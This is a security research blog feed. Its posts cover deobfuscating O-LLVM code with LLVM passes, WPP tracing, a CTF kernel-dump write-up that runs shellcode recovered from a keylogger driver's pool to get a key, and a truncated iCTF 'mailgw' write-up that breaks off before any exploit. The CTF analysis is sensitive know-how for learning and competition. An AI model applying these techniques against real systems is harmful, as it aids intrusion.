tag:blogger.com,1999:blog-53773783982978543792024-03-13T12:14:44.208-07:00Details are still coming inSecurity researches. <br>
IDA, windbg tips. <br>
Windows Kernel Developing. <br>
CTF tasks and so on. <br>
UFOlogists CTF Team.Anonymoushttp://www.blogger.com/profile/11822439249066904087noreply@blogger.comBlogger11125tag:blogger.com,1999:blog-5377378398297854379.post-27539577946112015722015-03-24T06:51:00.000-07:002015-03-25T01:36:46.761-07:00Deobfuscation: Test O-LLVM protected code with simplification passes.Roughly 5 years ago during researches in Taganrog Federal University we opened a discussion, what is the easiest way to protect program against heuristic analysis? The answer was easy, compile it with O0, O1, O2 and O3, and play with Ob and so on. <br />
<br />
The best way to do it - is to take existing compiler and modify it. Flexible and good structured LLVM already started to be de facto standard for developing multi-platform compiler with new optimization features. So in that moment we wanted to use LLVM byte code optimization modules for code replication. <br />
<br />
Our thoughts stayed thoughts, and I was pleasantly surprised when guys from Switzerland University presented <a href="https://github.com/obfuscator-llvm/obfuscator/wiki">o-llvm</a>. Guys made a great job and currently they are supporting Instruction Substitution, Bogus control flow and Control Flow Flattering. Choice was not casual, and in this blog entry I'll discuss about simplification problem complexity and will show o-LLVM how we can use LLVM compiler for resolving some o- LLVM transformations.<br />
<br />
<span class="fullpost"><br />
Let's start with review articles related to functional equivalency.<br />
First of all I want to point out [<a href="http://profs.sci.univr.it/~giaco/download/Watermarking-Obfuscation/Malaga2.pdf">1</a>], where S. Chow, V. Zakharov provided steps for Control flow flattering transformations and base on LBTM proved that minimization and redundancy resolving is PSPACE-hard. So, for example solving this problem can be equivalent mathematically to always complete Nintendo game (<a href="http://arxiv.org/pdf/1203.1895.pdf">from here</a>). <br />
<br />
If we would talk only about resolving opaque predicates, or reformulate - determining execution branch statically, then it's a NP-hard problem. In [<a href="http://www.cs.virginia.edu/~jck/publications/dsn_distribute.pdf">2</a>] Chenxi Wang and others showed it base on 3-SAT problem and suggested 2 possible approximation methods: Brute-force search method (executing all blocks) and Alias-detection approximation methods (opaque predicates matching). <a href="http://blog.quarkslab.com/deobfuscation-recovering-an-ollvm-protected-program.html">Quarkslab</a> team successful simplified transformation using miasm framework base on pattern matching for predicates and symbolic execution. Referenced attempt also complained that "there are always particular cases depending on the target binary" which, of course will make impossible automatic simplification system.<br />
<br />
Briefly let's look thought complexity of other obfuscation techniques mentioned in <a href="https://researchspace.auckland.ac.nz/bitstream/handle/2292/3491/TR148.pdf">obfuscation taxonomy</a>. The easiest dead code elimination (DCE), as you might know, takes O(n^2), <a href="http://www.rw.cdl.uni-saarland.de/~grund/papers/cgo08-liveness.pdf">liveness analysis</a> O(n^3)(DCE + O(|n|)), SAT predicates that could be solved with PPSZ O(2^{0.386n}), <a href="http://research.cs.wisc.edu/wpis/papers/tr1461.pdf">code duplication elimination</a> is EXPTIME, restructured array can be assessed like SSA + sort = n^2*log(n). <br />
I want to mention also Podlovchenko and his <a href="http://cyberleninka.ru/article/n/o-primenenii-metodov-deobfuskatsii-programm-dlya-obnaruzheniya-slozhnyh-kompyuternyh-virusov">articles </a>about using Algebraic models for program equivalency. Depending on the model belongs to transformation, complexity varies from logarithmic to NP.<br />
<br />
I think now idea is clear. For a most transformation techniques simplification is possible. For a moment there are no universal methods of simplification, and only some experiments with it were made. In my blog entry I want to show how LLVM could help us with simplification. <br />
Our steps are the following:<br />
- compile code to LLVM-IR with o-LLVM obfuscation enabled(use omit-llvm flag)<br />
- optimize obfuscated LLVM-IR with released LLVM version.<br />
- generate graph for both IR<br />
<br />
For experiments we will use code from Quarkslab experiments. <br />
<br />
<!-- HTML generated using hilite.me --><div style="background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%"><span style="color: #00BB00; font-weight: bold">unsigned</span> <span style="color: #00BB00; font-weight: bold">int</span> <span style="color: #00A000">target_function</span>(<span style="color: #00BB00; font-weight: bold">unsigned</span> <span style="color: #00BB00; font-weight: bold">int</span> n)
{
<span style="color: #00BB00; font-weight: bold">unsigned</span> <span style="color: #00BB00; font-weight: bold">int</span> mod <span style="color: #666666">=</span> n <span style="color: #666666">%</span> <span style="color: #666666">4</span>;
<span style="color: #00BB00; font-weight: bold">unsigned</span> <span style="color: #00BB00; font-weight: bold">int</span> result <span style="color: #666666">=</span> <span style="color: #666666">0</span>;
<span style="color: #AA22FF; font-weight: bold">if</span> (mod <span style="color: #666666">==</span> <span style="color: #666666">0</span>) result <span style="color: #666666">=</span> (n <span style="color: #666666">|</span> <span style="color: #666666">0xBAAAD0BF</span>) <span style="color: #666666">*</span> (<span style="color: #666666">2</span> <span style="color: #666666">^</span> n);
<span style="color: #AA22FF; font-weight: bold">else</span> <span style="color: #AA22FF; font-weight: bold">if</span> (mod <span style="color: #666666">==</span> <span style="color: #666666">1</span>) result <span style="color: #666666">=</span> (n <span style="color: #666666">&</span> <span style="color: #666666">0xBAAAD0BF</span>) <span style="color: #666666">*</span> (<span style="color: #666666">3</span> <span style="color: #666666">+</span> n);
<span style="color: #AA22FF; font-weight: bold">else</span> <span style="color: #AA22FF; font-weight: bold">if</span> (mod <span style="color: #666666">==</span> <span style="color: #666666">2</span>) result <span style="color: #666666">=</span> (n <span style="color: #666666">^</span> <span style="color: #666666">0xBAAAD0BF</span>) <span style="color: #666666">*</span> (<span style="color: #666666">4</span> <span style="color: #666666">|</span> n);
<span style="color: #AA22FF; font-weight: bold">else</span> result <span style="color: #666666">=</span> (n <span style="color: #666666">+</span> <span style="color: #666666">0xBAAAD0BF</span>) <span style="color: #666666">*</span> (<span style="color: #666666">5</span> <span style="color: #666666">&</span> n);
<span style="color: #AA22FF; font-weight: bold">return</span> result;
}
</pre></div><br />
Here is LLVM-IR listing of function compiled with O0.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnQujk1YkKlGYUfVX8Okj_g_FAU6ZYpLb4fLcsuCUq19ByAax4wTvCd9UYYByLFLpoC4tgCvRsQcHwYCaH8R5gImStV3gOoztdgpUc1wQMmDiHpYyNpLWp4G_GHVu3piz56vcehLk3FSI/s1600/target.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnQujk1YkKlGYUfVX8Okj_g_FAU6ZYpLb4fLcsuCUq19ByAax4wTvCd9UYYByLFLpoC4tgCvRsQcHwYCaH8R5gImStV3gOoztdgpUc1wQMmDiHpYyNpLWp4G_GHVu3piz56vcehLk3FSI/s640/target.png" /></a></div><br />
<br />
1. Let's start from Instruction Substitution, as from very basic technology.<br />
<br />
<table border="1"><tr> <td><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSpIJOfSWIRswGx_g5sffIhKRoSyeKFR-gavQn6hVc0800IKU-fYVB-OwwPcMsM50hrgX5hr-9QMegOWq4j0ElXNSmq7B4wnUanzw0geynr_5bLmoE0rXEhQf175QmkbQcIHi2_GAa6g0/s1600/target_sub.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSpIJOfSWIRswGx_g5sffIhKRoSyeKFR-gavQn6hVc0800IKU-fYVB-OwwPcMsM50hrgX5hr-9QMegOWq4j0ElXNSmq7B4wnUanzw0geynr_5bLmoE0rXEhQf175QmkbQcIHi2_GAa6g0/s640/target_sub.png" /></a></div></td> <td><br />
<div class="separator" style="clear: both; text-align: left;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMNg0IgsfnsABcwKLJ-yNlAxkKAl_6GwfvLt0xC9iU10uSLPVF_-tqR4QqJZET2epW1ebNiRPUYxmS3khTB8PaXWinE7EkwNhnb1QPOpApIRDG9eT-ODS7q0nNuaDjW5FFXKDkcwoB0_Q/s1600/opt_target_sub.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMNg0IgsfnsABcwKLJ-yNlAxkKAl_6GwfvLt0xC9iU10uSLPVF_-tqR4QqJZET2epW1ebNiRPUYxmS3khTB8PaXWinE7EkwNhnb1QPOpApIRDG9eT-ODS7q0nNuaDjW5FFXKDkcwoB0_Q/s320/opt_target_sub.png" /></a></div></td> </tr>
</table><br />
As you can see, LLVM correctly resolved Substitution techniques for 3 branches. I assume that ideally, last branch should also be optimized. Running LLVM optimization to see the exact behavior I'll show in later posts.<br />
<br />
2. The next transformation to analyze is Bogus CFG<br />
<br />
<table border="1"><tr> <td><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9YIMyT3mSE0gjQynXnwlMJOLZ6LE32e4CBQ8ZpW_QAZ8F1zlXzDErECA4IZg7ZySy4MrUD6RC35mrSL3l3QkG9qAbwknfTj5ywDFJHdYo2hD1eyLUG-VJIElGBvp07H2Yt6XC18ZFBK4/s1600/target_bcf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9YIMyT3mSE0gjQynXnwlMJOLZ6LE32e4CBQ8ZpW_QAZ8F1zlXzDErECA4IZg7ZySy4MrUD6RC35mrSL3l3QkG9qAbwknfTj5ywDFJHdYo2hD1eyLUG-VJIElGBvp07H2Yt6XC18ZFBK4/s640/target_bcf.png" /></a></div></td> <td><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiijWeUxBZADGQLx0srvgl8iiyrloPGfJ3r18xyTlsABI1TyGr5NS79lTHtc-EnKJXZ2Bx8SfdmEenSOe-IA2KV4-8obqNd5DrZxG1iVu86VLQ8X8Q0hgiU8Vk5Yir7ys2GoKcvpgOkgoQ/s1600/opt_target_bcf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiijWeUxBZADGQLx0srvgl8iiyrloPGfJ3r18xyTlsABI1TyGr5NS79lTHtc-EnKJXZ2Bx8SfdmEenSOe-IA2KV4-8obqNd5DrZxG1iVu86VLQ8X8Q0hgiU8Vk5Yir7ys2GoKcvpgOkgoQ/s640/opt_target_bcf.png" /></a></div></td> </tr>
</table><br />
LLVM removed 3 blocks, and optimized few of them. The third and last (TF) block from bottom looks weird and FALSE connecting to them. I think with a one more backward iteration LLVM could simplify those redundant FALSE brunches.<br />
<br />
3. The last transformation I want to test is Flattering CFG<br />
<br />
<table border="1"><tr><td><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdajpDOZX73fl0Yx9epqtrjTNDzVk2Fd8dLwFQpMbOFmvcSlyFsarNr30RU3jDH8XACXaJ920EYbeQOgMwFJ4u8bNzG-D8iQl7KI_9H7WM6wKmJyJvs_Upq6vUmfjgOx_d2I5jb3lPgY0/s1600/target_flat.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdajpDOZX73fl0Yx9epqtrjTNDzVk2Fd8dLwFQpMbOFmvcSlyFsarNr30RU3jDH8XACXaJ920EYbeQOgMwFJ4u8bNzG-D8iQl7KI_9H7WM6wKmJyJvs_Upq6vUmfjgOx_d2I5jb3lPgY0/s640/target_flat.png" /></a></div></td></tr>
<tr><td><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOMNUZheChtP_1uEpEL-R-qrUDRriTILXYN6-WgbWTSufK1tI-lzh0lt-DErJg4c_GvyXpLWWT7jbbHHK9L2rwLMLLkV3Mlvs24CaCHOgwaqSiyE6difPKIXfIJM6-ukYFdFro77B9oJU/s1600/opt_target_flat.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOMNUZheChtP_1uEpEL-R-qrUDRriTILXYN6-WgbWTSufK1tI-lzh0lt-DErJg4c_GvyXpLWWT7jbbHHK9L2rwLMLLkV3Mlvs24CaCHOgwaqSiyE6difPKIXfIJM6-ukYFdFro77B9oJU/s640/opt_target_flat.png" /></a></div></td></tr>
</table><br />
State machine created on flattering transformation was kept by LLVM. The only optimization was made is combining code from different states. Optimized 21 - 28 entries are the same, and I'm wondering why LLVM still kept them. If those blocks will be removed, code will be pretty the same with optimized Instruction Substitution.<br />
<br />
<br />
LLVM has a good architecture and allows developer/researcher or malware writer to modify code in any direction he wants. For the people who want to get deep into o-LLVM I highly recommend to read <a href="http://it-ebooks.info/book/4588/">Getting started with LLVM</a> first.<br />
Experiments showed us, that LLVM already can simplify some easy transformation and with modification for sure will be able to resolve complex stuff. But it's already cat and mouse game. The good feedback after my tests is that's already possible to create replication engine with LLVM - O-LLVM and <a href="https://github.com/trailofbits/mcsema">mc-sema</a> as a bin to LLVM translation engine.<br />
<br />
In next blog posts I wanted to do some more experiments with [Obfuscation-] LLVM and mc-sema.<br />
</span>Anonymoushttp://www.blogger.com/profile/11822439249066904087noreply@blogger.com0Weingarten, Germany47.8096019 9.637983200000007947.7669419 9.5573022000000076 47.852261899999995 9.7186642000000081tag:blogger.com,1999:blog-5377378398297854379.post-62800524696222027332015-01-05T15:34:00.001-08:002015-01-05T15:34:51.900-08:00Using WPP to trace usermode appsI've created sample app <a href="https://github.com/antoxar/WPPTracingSample">here</a> to don't forget howto include WPP into system service. For more details in Russian blog post is on <a href="http://habrahabr.ru/post/247173/">habrahabr</a>.Anonymoushttp://www.blogger.com/profile/11822439249066904087noreply@blogger.com0tag:blogger.com,1999:blog-5377378398297854379.post-8495023772131386812013-07-22T08:59:00.001-07:002013-07-24T13:15:47.248-07:00UFOCTF WriteUP: Mmmm, Whiskey metal<div dir="ltr" style="text-align: left;" trbidi="on">
<b>Task: </b><br />
My brother has taught me the Windows kernel programming, but I always asked him to help me with debugging. He was pissed off after a while. So he created kernel dump analysis task for me. I can't find answer. Please help me to find key and I will give you N points. I know that he modified my keylogger somehow, and I'm sure that driver already unloaded in virtual PC.<br />
<br />
P.S. I already get a few tips:<br />
- key is SHA256 or decoded string<br />
- My brother always make "Burp" and likes tea.<br />
<br />
Here you can find a dump.<br />
https://docs.google.com/file/d/0Bw72cstp5cGsMVlDSlBJU05fdVE<br />
<br />
Here is a short how to...<br />
<span class="fullpost">
<br />
First you should find "Burp" log string in the memory dump. There is a two ways here. Using DebugView<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrVH6DiGjkoeWDF-h5F0qzOe7QTaUKIcbHrSR8-HzUY4EhtXAtN87BWveDEef8pT1Aos0oqtk2mrKmUcY5ziA-b55qESn9ah7T0jPW-CrVDcT-jcmbgg6rZDE4JEQjSbcq4zyJOOqUT60/s1600/UFOCTF2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="369" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrVH6DiGjkoeWDF-h5F0qzOe7QTaUKIcbHrSR8-HzUY4EhtXAtN87BWveDEef8pT1Aos0oqtk2mrKmUcY5ziA-b55qESn9ah7T0jPW-CrVDcT-jcmbgg6rZDE4JEQjSbcq4zyJOOqUT60/s640/UFOCTF2.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Or just using search in WinDbg</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJn-Y9IbBAC1xGtP-IkjeQaFy_6IN1SyJdrA_5QuERisEP1foozHeX4bPZ55_7U5wJJxW6kmttFFjVSQ34ReHAnqsEXy1jzi5FsTt6anis8If0sNth0x0r_nczA43bnphn-pQVQBQWB8g/s1600/UFOCTF1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="369" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJn-Y9IbBAC1xGtP-IkjeQaFy_6IN1SyJdrA_5QuERisEP1foozHeX4bPZ55_7U5wJJxW6kmttFFjVSQ34ReHAnqsEXy1jzi5FsTt6anis8If0sNth0x0r_nczA43bnphn-pQVQBQWB8g/s640/UFOCTF1.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="text-align: center;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="text-align: center;">Next start to analyze pool shown in log</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY0EY03qmPT3R2kBehltSRY-Ib-Lv1vAORtQomlx8dVR1U6ZFEK9tFxtTnSwx3siDOH0Z4pxJaMN87lKfmKYjH86m21AKbrPrR6btL0XM4rWcXXPJdxkNoTxA69oegAWXKWRKV-F-sNO8/s1600/UFOCTF3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="369" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY0EY03qmPT3R2kBehltSRY-Ib-Lv1vAORtQomlx8dVR1U6ZFEK9tFxtTnSwx3siDOH0Z4pxJaMN87lKfmKYjH86m21AKbrPrR6btL0XM4rWcXXPJdxkNoTxA69oegAWXKWRKV-F-sNO8/s640/UFOCTF3.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">Take a look inside.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJSoi15yILWBud4RHZ7pJSKYumnoFhS-I0SlzkuqBwfryKypF3gSfE-ndT2MgAZvSq_pdFW-dsf9mnMJg7ylXtkAFwxEdXCeYCzv9IlmyPnfVy-ckNBI9ioYgxtLDP-g7frghhNeJkIjI/s1600/UFOCTF4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="369" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJSoi15yILWBud4RHZ7pJSKYumnoFhS-I0SlzkuqBwfryKypF3gSfE-ndT2MgAZvSq_pdFW-dsf9mnMJg7ylXtkAFwxEdXCeYCzv9IlmyPnfVy-ckNBI9ioYgxtLDP-g7frghhNeJkIjI/s640/UFOCTF4.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">Executable code found. Let's execute them. First we save memory.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiV-KV6C-A7c-aDuGvkPJF6gdqNBTJGagVanGEmreJfasFX-ra7VQaGMagMKEgn9735HXCsfrID_yTrXgtOcONl4PTd5tHz-0_l3vIAZ-WDCNNeiqZnzKeYgOEJXg83sJQf3O9y1C3pRII/s1600/UFOCTF8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="369" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiV-KV6C-A7c-aDuGvkPJF6gdqNBTJGagVanGEmreJfasFX-ra7VQaGMagMKEgn9735HXCsfrID_yTrXgtOcONl4PTd5tHz-0_l3vIAZ-WDCNNeiqZnzKeYgOEJXg83sJQf3O9y1C3pRII/s640/UFOCTF8.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">To execute I will use Windbg. Load notepad in windbg, Readmem and set eip.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1OhPKTmai29JBx2SVvU7qdNg4i3R21HG-6IDa-VpHyMNmB7OwA3p-m2n-jCbUNGDj6CCJaYgdp6hdiFmg9QhEyWsPwqIziV3uU7wC-A2iP4nzPONX6wvn9TaFxHIM0b6H8j5bZY25-h8/s1600/UFOCTF9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="369" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1OhPKTmai29JBx2SVvU7qdNg4i3R21HG-6IDa-VpHyMNmB7OwA3p-m2n-jCbUNGDj6CCJaYgdp6hdiFmg9QhEyWsPwqIziV3uU7wC-A2iP4nzPONX6wvn9TaFxHIM0b6H8j5bZY25-h8/s640/UFOCTF9.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">Here is a key:</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSF91aifd9QAP2NBbOyFEAfz_nLv6AdL1r5EUBOT7yFAcmbRY_I3-TVrzTGQRUNatBv6ZDsLvmYJYKP9JstSA9ag7GUo-bwTVZXcXGczw6MNY_C1fiLrBuXRS5PVa9eR-9OzgwsqL4y2o/s1600/UFOCTF10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="369" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSF91aifd9QAP2NBbOyFEAfz_nLv6AdL1r5EUBOT7yFAcmbRY_I3-TVrzTGQRUNatBv6ZDsLvmYJYKP9JstSA9ag7GUo-bwTVZXcXGczw6MNY_C1fiLrBuXRS5PVa9eR-9OzgwsqL4y2o/s640/UFOCTF10.png" width="640" /></a></div>
</span></div>Anonymoushttp://www.blogger.com/profile/11822439249066904087noreply@blogger.com0tag:blogger.com,1999:blog-5377378398297854379.post-26477732204206691842013-02-07T23:22:00.000-08:002013-02-07T23:22:06.759-08:00Detecting abnormal executable files using binary code mining<iframe src="http://www.slideshare.net/slideshow/embed_code/12118569" width="427" height="356" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" style="border:1px solid #CCC;border-width:1px 1px 0;margin-bottom:5px" allowfullscreen webkitallowfullscreen mozallowfullscreen> </iframe> <div style="margin-bottom:5px"> <strong> <a href="http://www.slideshare.net/AntonRechkov/beamer-daad-final" title="Rechkov. Lomonosov Report" target="_blank">Rechkov. Lomonosov Report</a> </strong> from <strong><a href="http://www.slideshare.net/AntonRechkov" target="_blank">Anton Rechkov</a></strong> </div>
P.S. Please don't shy to add comments and ideas!Anonymoushttp://www.blogger.com/profile/11822439249066904087noreply@blogger.com0tag:blogger.com,1999:blog-5377378398297854379.post-57741010266700803732011-12-03T03:56:00.000-08:002011-12-03T04:00:31.779-08:00Write up Mailgw ICTF2011<div dir="ltr" style="text-align: left;" trbidi="on">It was best CTF, which I ever played. Thanks to organisers very much. I'm in TU Berlin write know and I played with ENOFLAG team. <br />
In this topic I will describe mailgw service. <br />
<span class="fullpost"><br />
Lets analyse it with IDA. Analysis of server application should starts from accept function.<br />
<div class="cpp" style="background-color: #f0f0f0; border: 1px solid rgb(208, 208, 208); color: #000066; font-family: monospace;"><span class="fullpost"><span class="fullpost" style="font-size: small;"><span style="color: blue;">while</span> <span style="color: green;">(</span> <span style="color: #0000dd;">1</span> <span style="color: green;">)</span></span></span><br />
<span class="fullpost"><span class="fullpost" style="font-size: small;"><span style="color: green;">{</span></span></span><br />
<span class="fullpost"><span class="fullpost" style="font-size: small;"> v23 <span style="color: navy;">=</span> <span style="color: #0000dd;">16</span><span style="color: teal;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost" style="font-size: small;"> v24 <span style="color: navy;">=</span> accept<span style="color: green;">(</span>v25, <span style="color: green;">(</span><span style="color: blue;">struct</span> sockaddr <span style="color: #000040;">*</span><span style="color: green;">)</span><span style="color: #000040;">&</span>v28, <span style="color: green;">(</span>socklen_t <span style="color: #000040;">*</span><span style="color: green;">)</span><span style="color: #000040;">&</span>v23<span style="color: green;">)</span><span style="color: teal;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost" style="font-size: small;"> <span style="color: blue;">if</span> <span style="color: green;">(</span> v24 <span style="color: navy;"><</span> <span style="color: #0000dd;">0</span> <span style="color: green;">)</span></span></span><br />
<span class="fullpost"><span class="fullpost" style="font-size: small;"> <span style="color: green;">{</span></span></span><br />
<span class="fullpost"><span class="fullpost" style="font-size: small;"> v13 <span style="color: navy;">=</span> __errno_location<span style="color: green;">(</span><span style="color: green;">)</span><span style="color: teal;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost" style="font-size: small;"> v14 <span style="color: navy;">=</span> <span style="color: #0000dd;">strerror</span><span style="color: green;">(</span><span style="color: #000040;">*</span>v13<span style="color: green;">)</span><span style="color: teal;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost" style="font-size: small;"> <span style="color: #0000dd;">fprintf</span><span style="color: green;">(</span><span style="color: blue;">stderr</span>, <span style="color: red;">"ERROR: accept on socket failed: %s<span style="color: #000099; font-weight: bold;">\n</span>"</span>, v14<span style="color: green;">)</span><span style="color: teal;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost" style="font-size: small;"> result <span style="color: navy;">=</span> <span style="color: #0000dd;">1</span><span style="color: teal;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost" style="font-size: small;"> <span style="color: blue;">goto</span> LABEL_34<span style="color: teal;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost" style="font-size: small;"> <span style="color: green;">}</span></span></span><br />
<span class="fullpost"><span class="fullpost" style="font-size: small;"> v19 <span style="color: navy;">=</span> fork<span style="color: green;">(</span><span style="color: green;">)</span><span style="color: teal;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost" style="font-size: small;"> <span style="color: blue;">if</span> <span style="color: green;">(</span> v19 <span style="color: navy;"><</span> <span style="color: #0000dd;">0</span> <span style="color: green;">)</span></span></span><br />
<span class="fullpost"><span class="fullpost" style="font-size: small;"> <span style="color: green;">{</span></span></span><br />
<span class="fullpost"><span class="fullpost" style="font-size: small;"> v15 <span style="color: navy;">=</span> __errno_location<span style="color: green;">(</span><span style="color: green;">)</span><span style="color: teal;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost" style="font-size: small;"> v16 <span style="color: navy;">=</span> <span style="color: #0000dd;">strerror</span><span style="color: green;">(</span><span style="color: #000040;">*</span>v15<span style="color: green;">)</span><span style="color: teal;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost" style="font-size: small;"> <span style="color: #0000dd;">fprintf</span><span style="color: green;">(</span><span style="color: blue;">stderr</span>, <span style="color: red;">"ERROR: fork failed: %s<span style="color: #000099; font-weight: bold;">\n</span>"</span>, v16<span style="color: green;">)</span><span style="color: teal;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost" style="font-size: small;"> result <span style="color: navy;">=</span> <span style="color: #0000dd;">1</span><span style="color: teal;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost" style="font-size: small;"> <span style="color: blue;">goto</span> LABEL_34<span style="color: teal;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost" style="font-size: small;"> <span style="color: green;">}</span></span></span><br />
<span class="fullpost"><span class="fullpost" style="font-size: small;"> <span style="color: blue;">if</span> <span style="color: green;">(</span> <span style="color: #000040;">!</span>v19 <span style="color: green;">)</span></span></span><br />
<span class="fullpost"><span class="fullpost" style="font-size: small;"> <span style="color: blue;">break</span><span style="color: teal;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost" style="font-size: small;"> close<span style="color: green;">(</span>v24<span style="color: green;">)</span><span style="color: teal;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost" style="font-size: small;"><span style="color: green;">}</span></span></span><br />
<span class="fullpost"><span class="fullpost" style="font-size: small;">dup2<span style="color: green;">(</span>v24, <span style="color: #0000dd;">0</span><span style="color: green;">)</span><span style="color: teal;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost" style="font-size: small;">dup2<span style="color: green;">(</span>v24, <span style="color: #0000dd;">1</span><span style="color: green;">)</span><span style="color: teal;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost" style="font-size: small;">result <span style="color: navy;">=</span> manage_tcp_client<span style="color: green;">(</span><span style="color: green;">)</span><span style="color: teal;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost" style="font-size: small;"><span style="color: green;">}</span></span></span></div><span class="fullpost"><span class="fullpost"><br />
As you can see. Child logic provides in <b>manage_tcp_client</b> function.<br />
There is a switch with following values:<br />
n - create account;<br />
q - quit;<br />
m - message;<br />
r - read;<br />
+ - create recipient;<br />
- - create recipient;<br />
l - list recipients;<br />
s - send message.<br />
<br />
Main attention attract the '+' block.<br />
There is memory allocation and <br />
</span><br />
</span><br />
